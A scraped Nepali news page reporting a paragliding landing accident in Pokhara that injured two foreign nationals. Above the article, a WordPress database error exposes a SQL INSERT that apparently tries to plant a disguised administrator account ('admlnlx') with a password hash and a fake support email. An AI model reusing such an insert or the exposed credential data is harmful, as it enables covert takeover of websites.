WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B545JnLto8R7zo7ezDscqycG5Nabgz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 03:36:42', '', 'admlnlx', 'admlnlx')

पोखरामा फेरि प्याराग्लाइडिङ दुर्घटना – Gaule Khabar

पोखरामा फेरि प्याराग्लाइडिङ दुर्घटना

पोखरामा फेरि प्याराग्लाइडिङ दुर्घटना

गाउँले न्यूज, ५ चैत, पोखरा । पोखरामा प्याराग्लाइडिङ दुर्घटना भएको छ । मंगलबार ल्यान्डिङका क्रममा दुर्घटना हुँदा २ विदेशी नागरिक घाइते भएका छन् । घाइते हुनेमा रसियन चालक एलेक्स वक्रिएन र चिनियाँ ७ वर्षीय बालक याङ गुङ जे भएको प्रहरीले जनाएको छ ।

सराङकोटबाट उडेको प्याराग्लाइडिङ खपौंदीमा अवतरणका क्रममा दुर्घटना भएको कास्की प्रहरीले जनाएको छ । उनीहरुको अहिले मनिपाल शिक्षण अस्पतालमा उपचार भइरहेको छ । अघिल्लो महिना मात्रै पोखरामा ४ प्याराग्लाइडिङ दुर्घटना भएका थिए । जसमा २ जनाको मृत्यु भएको थियो भने २ जना घाइते भएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका